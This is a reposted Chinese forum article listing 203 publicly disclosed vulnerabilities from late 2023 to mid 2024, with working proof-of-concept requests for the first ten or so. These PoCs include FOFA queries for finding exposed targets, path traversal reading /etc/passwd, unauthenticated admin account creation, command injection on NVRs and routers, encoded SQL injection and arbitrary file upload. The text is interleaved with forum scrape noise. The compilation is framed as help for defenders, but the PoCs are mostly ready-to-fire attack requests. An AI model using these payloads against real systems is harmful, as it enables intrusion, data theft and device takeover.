找回密码
 立即注册
查看: 6181|回复: 0
打印 上一主题 下一主题

互联网公开漏洞整理202309-202406--转载

[复制链接]
跳转到指定楼层
楼主
发表于 2024-6-5 14:31:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
互联网公开漏洞整理202309-202406; y# K& v6 E) x
道一安全 2024-06-05 07:41 北京! B5 `! m, a/ A! ~/ G& y
以下文章来源于网络安全新视界 ,作者网络安全新视界, x5 D( A* @7 `' F6 `

% w( X  b! v  p$ {% }% o# v/ X& ]7 u发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。# F- h9 N. x. q# f: k3 h! K

' u& m1 c& `5 I5 e; G漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。4 ^) q+ m& o; A9 F

* k  w* H4 V; p* W7 a* L安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
3 m3 b* e: b7 T7 i# o0 l
6 Q, F& C' W+ J2 K文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。: H/ }9 C/ a; s+ U* j8 d+ }: L1 r

$ N6 P: B6 P' M合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。# x3 _( [% _& c  n- P/ i  s

6 G; F" C! W# `9 q: P# D# H7 E- [& }3 e
声明
0 _0 C! o! Y# }- n" v5 \3 i1 @# ?% q+ y
! ~6 ^2 j6 N3 C为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
; ]% g; w# [/ ~
( i3 k# X/ C  |: b% V! P有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
) R6 w! _' ]9 {- c
+ W, {1 M  b  Z, F$ `% s1 \3 |- I) i& l

) K0 Y4 w" I1 y8 e& h目录, s: |# Q. ?7 }. j2 E
. [* f5 f% u* A7 o$ G) N" g
01
* Z8 q) L/ m2 N. M5 B; M( Y( {/ K  v4 C( z9 y
1. StarRocks MPP数据库未授权访问# z8 Z# h5 j$ j/ [2 P
2. Casdoor系统static任意文件读取/ p) `; q% p! n* g5 E9 L
3. EasyCVR智能边缘网关 userlist 信息泄漏
' U# W/ ^. o1 m) l% ^4. EasyCVR视频管理平台存在任意用户添加4 D" R, ~# F9 m5 Y/ i
5. NUUO NVR 视频存储管理设备远程命令执行
6 \0 D$ F+ `$ g; G1 t  {8 _6. 深信服 NGAF 任意文件读取
% B9 k. x; e6 s& @3 J7. 鸿运主动安全监控云平台任意文件下载  v( [- {9 R; K* ?& P3 m9 @  \0 u
8. 斐讯 Phicomm 路由器RCE3 h. s) @0 h0 t6 ?
9. 稻壳CMS keyword 未授权SQL注入
5 i4 h% B% ]$ V4 G0 M9 `10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% Q# I+ d1 `8 t# x- L# B11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入; i2 y0 A/ j- A1 A3 r' h" Q
12. Jorani < 1.0.2 远程命令执行
2 r7 C5 T* P* Q) B13. 红帆iOffice ioFileDown任意文件读取1 X  ]/ }% k9 t! [1 M
14. 华夏ERP(jshERP)敏感信息泄露$ [% t) R( @# ?3 l/ g# u( `. [
15. 华夏ERP getAllList信息泄露
! C7 i7 S& R. q; ?/ ?16. 红帆HFOffice医微云SQL注入
4 P  j5 w+ x5 k" A17. 大华 DSS itcBulletin SQL 注入- H7 S7 ^& }# ?& @; o) v
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
9 f  L9 V: u9 n5 f19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 Y, z0 G# a. N3 ]8 W( l
20. 大华ICC智能物联综合管理平台任意文件读取/ w" u8 h- V, i9 }
21. 大华ICC智能物联综合管理平台random远程代码执行
) ?3 b1 z# S% p22. 大华ICC智能物联综合管理平台 log4j远程代码执行
) j# l4 r4 f8 f. o23. 大华ICC智能物联综合管理平台 fastjson远程代码执行3 O6 a3 H4 T- U- e
24. 用友NC 6.5 accept.jsp任意文件上传
. E/ q4 x! W* s25. 用友NC registerServlet JNDI 远程代码执行1 [5 c8 ?5 c0 j1 E3 U& @- y) f1 p
26. 用友NC linkVoucher SQL注入
" ]0 ?3 Q$ l* v/ q27. 用友 NC showcontent SQL注入
% J/ E; s- |7 W3 _' }" `" [28. 用友NC grouptemplet 任意文件上传0 O" i7 s9 t4 }3 ~  Q2 L
29. 用友NC down/bill SQL注入$ q( S) D, i9 }' I# U& s+ u" z* k+ i
30. 用友NC importPml SQL注入4 c& m0 i# o( Q$ j) t3 R) ~
31. 用友NC runStateServlet SQL注入# M& W" r; W, h6 g+ P: A& [' F! Q0 b
32. 用友NC complainbilldetail SQL注入# j! {5 B. E4 ?# |8 S
33. 用友NC downTax/download SQL注入
9 r- y' y. `7 l: b) r* F34. 用友NC warningDetailInfo接口SQL注入
7 J; K/ w1 e. w5 G: B35. 用友NC-Cloud importhttpscer任意文件上传; }. s4 ]' j5 h- [8 M
36. 用友NC-Cloud soapFormat XXE
" D1 L7 @  ^. V+ {6 f) ^37. 用友NC-Cloud IUpdateService XXE( p# C/ d% {9 o) I% _
38. 用友U8 Cloud smartweb2.RPC.d XXE
& v  H7 Q: J  V7 c39. 用友U8 Cloud RegisterServlet SQL注入% g/ ^( j$ B8 d, ^
40. 用友U8-Cloud XChangeServlet XXE
1 W$ k$ x. j1 Y" Z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 Z6 o' e% S1 I' B! [42. 用友GRP-U8 SmartUpload01 文件上传" M4 D- \- X5 i$ m  h9 h% b
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* K& d" }& z2 }* ?1 G) n44. 用友GRP-U8 bx_dj_check.jsp SQL注入+ t) U! }# }) e  @6 j
45. 用友GRP-U8 ufgovbank XXE
# O6 U' i" r' R9 G46. 用友GRP-U8 sqcxIndex.jsp SQL注入, L1 b5 i1 p  S7 y! T
47. 用友GRP A++Cloud 政府财务云 任意文件读取: r/ p( _+ k9 h! X/ p7 Q
48. 用友U8 CRM swfupload 任意文件上传  S2 }# ^, [5 _4 S- e/ ?9 C
49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 }  S5 K( N; U% F- e* V: i9 f& g
50. QDocs Smart School 6.4.1 filterRecords SQL注入
2 J' A! V$ }  }  \  ]& X51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
" S+ N8 h" ^/ {1 S! \- i! Y52. 泛微E-Office json_common.php sql注入/ J% @: F( l/ ?
53. 迪普 DPTech VPN Service 任意文件上传
+ U: q) X8 ~* Y1 K54. 畅捷通T+ getstorewarehousebystore 远程代码执行; z1 {% [2 Z% `6 J0 N/ |
55. 畅捷通T+ getdecallusers信息泄露
: K! u& e2 ~  Q56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE* N4 h0 h9 F( D7 b
57. 畅捷通T+ keyEdit.aspx SQL注入8 @. e' Y9 G1 X/ [- m7 P
58. 畅捷通T+ KeyInfoList.aspx sql注入
- A% `& n- I. F59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行/ S2 ]# E7 X8 ?* g8 h# J0 B* m  \
60. 百卓Smart管理平台 importexport.php SQL注入
  M3 F$ \, ]+ ^8 u* o61. 浙大恩特客户资源管理系统 fileupload 任意文件上传2 l3 X2 |  W1 V% x5 n
62. IP-guard WebServer 远程命令执行3 \& M( t* _- S& X/ E
63. IP-guard WebServer任意文件读取1 G9 U' G7 O/ \' L4 [, j
64. 捷诚管理信息系统CWSFinanceCommon SQL注入2 q) K7 g! U( ^) ]0 W3 d$ ?
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过, {4 \9 C. V4 J- o' B
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入: w2 Q9 v) q* V2 W; a
67. 万户ezOFFICE wpsservlet任意文件上传) P# C, I; t! r% @0 ~, ?  [3 X
68. 万户ezOFFICE wf_printnum.jsp SQL注入
# D6 e8 w0 i0 m% z( v+ y& A. I69. 万户 ezOFFICE contract_gd.jsp SQL注入
1 ^% {4 [( J* n6 C4 m. K! V70. 万户ezEIP success 命令执行
$ ?: @/ m, o/ f& \! g& {, P6 e" L71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入3 z) r$ L& Y" ?
72. 致远OA getAjaxDataServlet XXE4 C- q- D* j8 `
73. GeoServer wms远程代码执行5 {4 q% d& A" K
74. 致远M3-server 6_1sp1 反序列化RCE
& c+ X2 R) ]& b- f75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE. w: }9 E) f( T% z: S
76. 新开普掌上校园服务管理平台service.action远程命令执行
4 z, M& f0 w) B8 M3 t0 _1 {$ A77. F22服装管理软件系统UploadHandler.ashx任意文件上传
& {4 w, J( j! i3 N2 N3 ~78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- {. _7 j$ m4 q  P$ z
79. BYTEVALUE 百为流控路由器远程命令执行6 n( U6 u) r8 l* V8 X' P
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传- K( G$ E. X6 R: j7 q; O
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 E( b7 c- l$ u2 c. }
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行4 r9 O! ^! m* Y1 M( {( c; Q+ O( j% |4 }( T
83. JeecgBoot testConnection 远程命令执行/ E9 z" ], E  g8 J
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 X9 ~3 g9 a" T0 c- o
85. SysAid On-premise< 23.3.36远程代码执行& v% e8 R9 @. ^( X
86. 日本tosei自助洗衣机RCE
  D, C9 |# A1 i  R87. 安恒明御安全网关aaa_local_web_preview文件上传
6 f2 T. g: H  S  Y1 }1 z88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行# Z" s) j' y  u3 e; F! V0 K$ F* k
89. 致远互联FE协作办公平台editflow_manager存在sql注入
3 a% b% ?( l; w  K8 C4 S90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行0 r& d! k) Z6 [! H0 J
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取' n8 n) _" }* `5 M( _* S6 E% ?
92. 海康威视运行管理中心session命令执行
5 r$ w6 L2 j8 T93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
9 `, x1 k2 V' b( N! Y+ I94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% H7 a1 h! x7 Y95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行& C& e4 B  n( S2 d4 d
96. Apache OFBiz  18.12.11 groovy 远程代码执行
$ B+ Q8 `. s2 W# J0 H3 r97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ i" x+ U  S  K. z8 i5 o! o* b98. SpiderFlow爬虫平台远程命令执行
- I$ ^' e4 R: Q- A5 N99. Ncast盈可视高清智能录播系统busiFacade RCE
3 N( m  b0 ]2 M6 z! @: E4 K8 P% G100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传/ I5 q. N% m* a# n
101. ivanti policy secure-22.6命令注入
% M) V) v( r: Z& R102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行+ i( f3 |6 t$ N+ C
103. Ivanti Pulse Connect Secure VPN XXE
) O0 |  x! ~2 s3 e9 H7 Z5 `* H104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
3 t4 f3 H0 k1 a" N% n* M( H; o8 n105. SpringBlade v3.2.0 export-user SQL 注入5 J. O  c1 p2 c5 U1 X+ U3 H
106. SpringBlade dict-biz/list SQL 注入
% J# e+ C1 s- p1 e6 R107. SpringBlade tenant/list SQL 注入
- g- r: }0 a. b2 M9 R108. D-Tale 3.9.0 SSRF1 `4 w- ], G% l
109. Jenkins CLI 任意文件读取) x. p* U% _' Y7 k! \7 g" W
110. Goanywhere MFT 未授权创建管理员
0 p: @0 `+ \( [0 ]2 A# Y/ D111. WordPress Plugin HTML5 Video Player SQL注入5 a! e; N+ w/ s$ g9 N3 H
112. WordPress Plugin NotificationX SQL 注入
( ]8 W6 {2 k( f7 a113. WordPress Automatic 插件任意文件下载和SSRF
5 R: j/ J/ U$ L* b- ]114. WordPress MasterStudy LMS插件 SQL注入- b4 ~! i! U) X
115. WordPress Bricks Builder <= 1.9.6 RCE" N4 a- ]1 h$ r* {
116. wordpress js-support-ticket文件上传
9 Y6 C% V- C/ r4 x( m+ d117. WordPress LayerSlider插件SQL注入" h3 [1 ?; I0 q& v: c9 i3 n: D
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
1 M+ R2 |' w/ {" p4 U" j! ^! w, z119. 北京百绰智能S20后台sysmanageajax.php sql注入
# V+ ]4 W: O' R% W7 I8 F120. 北京百绰智能S40管理平台导入web.php任意文件上传: u+ M: Q# M7 c( A
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
5 \) g* `! v9 J122. 北京百绰智能s200管理平台/importexport.php sql注入0 B! c) F$ x# [+ X
123. Atlassian Confluence 模板注入代码执行
, y# H. I# @0 Q' H  e; @5 U124. 湖南建研工程质量检测系统任意文件上传$ r% i: h9 C, Q4 m+ Z
125. ConnectWise ScreenConnect身份验证绕过( o7 T/ A$ X9 @& L- v
126. Aiohttp 路径遍历
: j! u. X, J: l$ W  u4 O$ ~3 I127. 广联达Linkworks DataExchange.ashx XXE0 Z$ j7 e# {" J' q0 g2 u
128. Adobe ColdFusion 反序列化. ]6 F' h% W- u" P) g6 Q  t, l
129. Adobe ColdFusion 任意文件读取
/ c/ D7 y* o* Z/ H5 t130. Laykefu客服系统任意文件上传/ i* c2 r- u' o$ ~; A* p+ q# @
131. Mini-Tmall <=20231017 SQL注入5 l7 q9 F6 C8 h' u( |( b, X
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 @& G# u. K$ l3 T! B( M. f2 Z
133. H5 云商城 file.php 文件上传
  m% @* {+ _# T, c3 i5 _134. 网康NS-ASG应用安全网关index.php sql注入8 n- J( Y" T; H
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入5 n5 y6 c$ E# j3 l- d* `
136. NextChat cors SSRF! s* k. U% W: m, g# T0 `! p
137. 福建科立迅通信指挥调度平台down_file.php sql注入
+ A# D7 f  U  f138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" K5 n; \8 y8 `  n/ {; m139. 福建科立讯通信指挥调度平台editemedia.php sql注入
9 ?' f! E6 o! m140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入$ X2 i4 q1 `9 u$ J7 |
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* O! R5 Y. V  A8 H& l" z2 o* y142. CMSV6车辆监控平台系统中存在弱密码5 [/ A  {! ?# R- l
143. Netis WF2780 v2.1.40144 远程命令执行
, m) R- H' {5 D144. D-Link nas_sharing.cgi 命令注入
" p: E2 c, r5 I' x. v$ @145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
  c+ V: ~8 d1 K- D9 z& Z146. MajorDoMo thumb.php 未授权远程代码执行5 U8 b- o( e* T0 l$ d6 x" M% k
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
) L6 v% Q  Y1 c148. CrushFTP 认证绕过模板注入7 T5 _7 _' d3 A# w+ ]
149. AJ-Report开源数据大屏存在远程命令执行' y9 O$ p8 G1 ~/ C4 v) ^& M  Q$ U! ]
150. AJ-Report 1.4.0 认证绕过与远程代码执行* }8 a$ x6 W) t0 \) c
151. AJ-Report 1.4.1 pageList sql注入. |; u; T7 J/ q; W" P7 G* x( N$ m8 D
152. Progress Kemp LoadMaster 远程命令执行
: N) ^' \, `) s5 Q153. gradio任意文件读取
4 s9 @* K; B3 V. r6 `154. 天维尔消防救援作战调度平台 SQL注入. [0 k" \; A% N2 P) G! o2 N
155. 六零导航页 file.php 任意文件上传
5 [5 ]  d7 C% Y! M+ W156. TBK DVR-4104/DVR-4216 操作系统命令注入
7 n$ F5 l: ~+ a- r4 i: y& D6 N$ Z157. 美特CRM upload.jsp 任意文件上传6 R% k3 _# ^) \; ^9 v+ Z- }
158. Mura-CMS-processAsyncObject存在SQL注入
  G8 `8 _6 i8 \159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
1 s* d- H4 Q. D( X160. Sonatype Nexus Repository 3目录遍历与文件读取
: M3 [  q" @; \, Q) `. n4 _161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
* F& z  }3 C& T. ]162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
2 `# ?/ N: y7 _9 }( I& X163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
  \( d9 g4 o& H8 N( c8 x164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传& a1 {. B! d. ^$ v6 C) v( h9 j5 Z' l
165. OrangeHRM 3.3.3 SQL 注入0 z  Z/ e5 ]5 c5 T" ^4 M
166. 中成科信票务管理平台SeatMapHandler SQL注入
5 f# N( b+ k. ~7 D- z4 H" a167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ v  T/ d6 [( h168. 宏景EHR OutputCode 任意文件读取
5 ^( X* P! D9 ~; L$ Z169. 宏景EHR downlawbase SQL注入
5 d8 n& o2 J1 K) X, E. j170. 宏景EHR DisplayExcelCustomReport 任意文件读取4 T5 q: V. t) W3 n$ L: V- _
171. 通天星CMSV6车载定位监控平台 SQL注入
' f/ ?  b) ~! Y9 ^4 s172. DT-高清车牌识别摄像机任意文件读取
0 A1 i; v( C3 S7 {  E173. Check Point 安全网关任意文件读取
: T+ E& `5 C' ^* Q% w+ L+ W174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 w; W: n+ \, o9 `6 n
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
/ s9 h" `) E# w: r& Y# K: B% o" Q176. 电信网关配置管理系统 rewrite.php 文件上传
. H. k6 z: E& d6 z9 ~; P2 @177. H3C路由器敏感信息泄露
; a/ V7 w3 N* \/ X178. H3C校园网自助服务系统-flexfileupload-任意文件上传% n( J2 l' v2 J
179. 建文工程管理系统存在任意文件读取
5 P4 y( L8 m- [$ _3 m: ]; B180. 帮管客 CRM jiliyu SQL注入# S9 }9 D0 g" P6 Q# U6 h
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入+ G& ^2 g& n0 _* L
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建. \) Y9 l1 X& I+ y( V( X
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) x  B5 U8 w) h5 _  p184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
9 b$ b' F7 a/ k9 L8 r185. 瑞友天翼应用虚拟化系统SQL注入9 }# G0 v2 z9 `* ]* L: H- C. G7 t
186. F-logic DataCube3 SQL注入* I$ z9 a) ^7 k! h- A7 s! J( x
187. Mura CMS processAsyncObject SQL注入
. t1 m9 E" `9 K% V188. 叁体-佳会视频会议 attachment 任意文件读取/ @0 x8 r  [7 K. Z, F7 D
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
/ b8 y( a1 P- J( Z/ y- v0 e190. 短视频矩阵营销系统 poihuoqu 任意文件读取2 F- H* p! e$ W  \
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入( Q$ @) n' g7 `/ d  R' ^/ y
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 b' l. }' t4 a
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 ^6 p6 G2 k2 v: `- G7 F1 S3 O) q194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传: f( G. r* x6 J% `8 j( a/ r
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; J: B9 T; P! ]6 a4 ^
196. 河南省风速科技统一认证平台密码重置
1 p6 L9 K1 J! ~" Z* c3 U9 Z197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ D4 C6 F: y  j7 ]' q. a# D
198.  阿里云盘 WebDAV 命令注入- @, {3 ^# ]7 y  A1 l5 Y
199. cockpit系统assetsmanager_upload接口 文件上传
) l! `  \, ]- i; s% z) e7 n200. SeaCMS海洋影视管理系统dmku SQL注入+ h9 t" v2 v' @$ Q4 K- N% s- Q
201. 方正全媒体新闻采编系统 binary SQL注入+ H  Z' s( B' U5 N7 O: Y" W" Z7 t
202. 微擎系统 AccountEdit任意文件上传
2 [6 b% A) R0 O. L/ v203. 红海云EHR PtFjk 文件上传. _4 e! b5 s" g

9 }0 y; Z  `0 g& I- B; nPOC列表3 [! z! S! @/ X2 U4 W$ {- @
8 g3 j  L6 A# I1 `( u0 t/ o- D
02
/ c: p4 C. A6 d0 t" H# B8 |1 ~
1 f) E+ }- ~) B2 I# h$ {8 w5 X1. StarRocks MPP数据库未授权访问" n' P* U$ J, b3 i+ X
FOFA :title="StarRocks"  s7 ^9 n* m% k, l! K: g
GET /mem_tracker HTTP/1.1
1 T) [  b/ |5 ~! uHost: URL
  Z6 b" t! N% b& C  I: g. D8 E4 ^" K. n0 a3 \! O

/ W' C+ V1 N' Q+ q5 [- K, E/ a) D2. Casdoor系统static任意文件读取
( o0 C4 B- d" c1 [8 q8 y+ hFOFA :title="Casdoor"9 h/ I+ E5 c9 I6 P5 l$ E9 a) q
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
( I1 a( X% D8 [) p& O0 p4 HHost: xx.xx.xx.xx:9999
8 g4 P' P" u+ Y- G4 TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: n# d! D$ K: G6 z: B
Connection: close: E, l+ ?* @& D2 M1 A# z4 W  e, n
Accept: */*& F# c0 e' m1 p$ C% k" h: K. n
Accept-Language: en
" Y, g( x9 @: P' y$ lAccept-Encoding: gzip
' [$ M% B1 a7 u9 g& I  S) t* D3 ]$ M
6 j5 Q. c! s7 ^0 q, s/ x+ ^
3. EasyCVR智能边缘网关 userlist 信息泄漏2 @3 b, |, @- E$ ?8 \7 ~
FOFA :title="EasyCVR"
3 K' ^* e4 B  b0 u5 MGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
9 S" M! j9 A. C6 D1 BHost: xx.xx.xx.xx
' b) c6 i0 R: R* ^" N- C7 D" D3 V* h

, z2 V  f! D. S) @4. EasyCVR视频管理平台存在任意用户添加
2 t! \/ g8 Q: j. u% l- s# o% GFOFA :title="EasyCVR"! Z  o' j' |3 P. A

6 d7 o& n5 s0 }' d/ a' N1 Npassword更改为自己的密码md5/ _7 Z! A  I6 o
POST /api/v1/adduser HTTP/1.14 f0 V$ R' n' n
Host: your-ip
$ @7 I9 v' N- ^: cContent-Type: application/x-www-form-urlencoded; charset=UTF-8& R4 M7 h& B) l8 L2 L: v3 a3 I

' D! d; a8 ?. y' ~name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1, H! L; d, {! n

+ r6 U) R0 a' D6 a$ f6 i5 N- O. \7 y) |6 D
5. NUUO NVR 视频存储管理设备远程命令执行! ]% H( [2 A" |3 n$ [3 x- l" l$ ]
FOFA:title="Network Video Recorder Login"
2 N; V2 f8 z5 `GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1& _) z4 N* c% @! `
Host: xx.xx.xx.xx4 k8 j1 ~% a6 Q' x+ |6 E
0 U! {0 m1 H- I2 G2 h6 o

' A6 n' r( U  R2 C: |$ K6. 深信服 NGAF 任意文件读取
3 B% u1 r, p5 J! f& p* {FOFA:title="SANGFOR | NGAF"
; @: `6 o, V' QGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1  E& S$ q6 N: x1 {$ d
Host:; P& P/ b7 t; g1 H9 m2 i
0 j! Q/ Z, {* Z3 }: j: Q$ ?

& V1 m% _/ H/ {& ]7. 鸿运主动安全监控云平台任意文件下载/ e1 e% l+ S$ V: q4 T
FOFA:body="./open/webApi.html"
6 n- k4 A/ ]4 n  ]0 Q2 m" k2 rGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.11 c1 b" H! ~8 i* O$ z0 j
Host:
7 p8 _; `$ _2 @
* ^  w: f" W* i* Q# P+ P% a6 O. r7 t  c  r0 _
8. 斐讯 Phicomm 路由器RCE: B5 D' l- j+ a" L4 W1 b
FOFA:icon_hash="-1344736688"
: e( \/ l6 I) c6 U6 E默认账号admin登录后台后,执行操作
: t5 m# i6 v- ePOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ x  v& ^/ v! _$ z8 DHost: x.x.x.x
' t0 l5 {  Z2 d( `6 K) u& YCookie: sysauth=第一步登录获取的cookie5 X1 p9 @3 _5 ^9 a9 H# G# G: P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz( p* H  e/ X1 _: E- N. {: P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36: J1 M# _/ m, X' }% g5 o$ t
9 h" @2 M0 I) y4 K+ V
------WebKitFormBoundaryxbgjoytz
1 O& J$ e) s. I- `  xContent-Disposition: form-data; name="wifiRebootEnablestatus"
* v. R8 C/ ?2 \+ @9 _- [5 m5 H- T" e- Z; ^5 f9 M
%s% w/ ~( S* L$ j7 `
------WebKitFormBoundaryxbgjoytz0 ?9 x( T! R% ]% w
Content-Disposition: form-data; name="wifiRebootrange"( M% `/ o0 L6 i3 e/ y

( A" W4 b! |/ |9 w, x12:00; id;
- K1 {% b! s9 N( D0 ]3 f------WebKitFormBoundaryxbgjoytz
" s' K$ t: N% S1 `5 jContent-Disposition: form-data; name="wifiRebootendrange"; p  K4 s  |4 ?2 g8 ?
/ e7 J3 L6 g$ G4 Q! v% A0 Y8 X" [
%s:% R3 j& o( m! ^. V% l
------WebKitFormBoundaryxbgjoytz# f* \3 o0 x1 u
Content-Disposition: form-data; name="cururl2"
; C( _$ b) h( j' n
# L- \2 E) U" ^8 P+ N  c
- ?/ c3 v! x/ K9 A2 s4 G4 d9 Z% s------WebKitFormBoundaryxbgjoytz--
7 F+ Y, F/ \; A1 i, M! u) Z, U' X( c) x% V2 K. l  C0 C' N& r% [

1 b3 H4 b8 O' F( ?3 A  f9. 稻壳CMS keyword 未授权SQL注入" D' `( b1 |- U& J
FOFA:app="Doccms"
- h7 O* z! K9 F3 c1 L. H! a; EGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1% D3 ~8 B% @- ?5 }- ~
Host: x.x.x.x
; R# B9 |& y% Q; w6 Z- q/ [* m( R0 j; ?
: e, O- f& A  z2 P8 E5 H# U; [# F7 _
payload为下列语句的二次Url编码
% N) x3 R+ \3 z: z- ~, m7 N: x  M7 k
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
8 d3 K- c" I) d9 K! x) H/ Y7 ~
+ X/ z- D" [. l; P10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
4 |0 u) q6 F# s4 dFOFA:icon_hash="953405444"+ r2 d+ X. P2 p

% u  p8 B2 |. O8 i% y文件上传后响应中包含上传文件的路径' E% t; C, ?( j
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
  i. C. P" W( _: nHost: x.x.x.x:xx6 d4 W% Q0 u9 x+ r& Z. z0 n9 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% X" S7 m; B- }Content-Length: 197
7 S' P7 F# b* z+ A/ Y9 j5 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ I* M% R5 R) e3 L7 f
Accept-Encoding: gzip, deflate
2 B' |" \# ]: U' LAccept-Language: zh-CN,zh;q=0.9
; P( q* ^5 m/ o( YConnection: close
# F1 `3 e; Z7 c; XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ |2 o8 O5 Y; c' I$ I& \1 U8 d9 r# o; C
------WebKitFormBoundaryxdgaqmqu
- l; k: ], M( k$ B( {2 c7 ?Content-Disposition: form-data; name="file"filename="icfitnya.txt"* H$ G) @( p6 B8 N) [* r
Content-Type: text/html; g# P5 _! m2 I2 [; V
; V: ^- ]6 F# P; N% z! ]2 ]
jmnqjfdsupxgfidopeixbgsxbf# Z6 @& h2 C! g6 N' A& ]2 `/ N
------WebKitFormBoundaryxdgaqmqu--+ k$ p- {3 X; \3 R- J9 Z8 F
+ ?. E  @7 S: ], L; v. ]  F% Z
$ B5 j! f. c: @: a: N+ g
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
0 n& Z* m8 X! ?* XFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
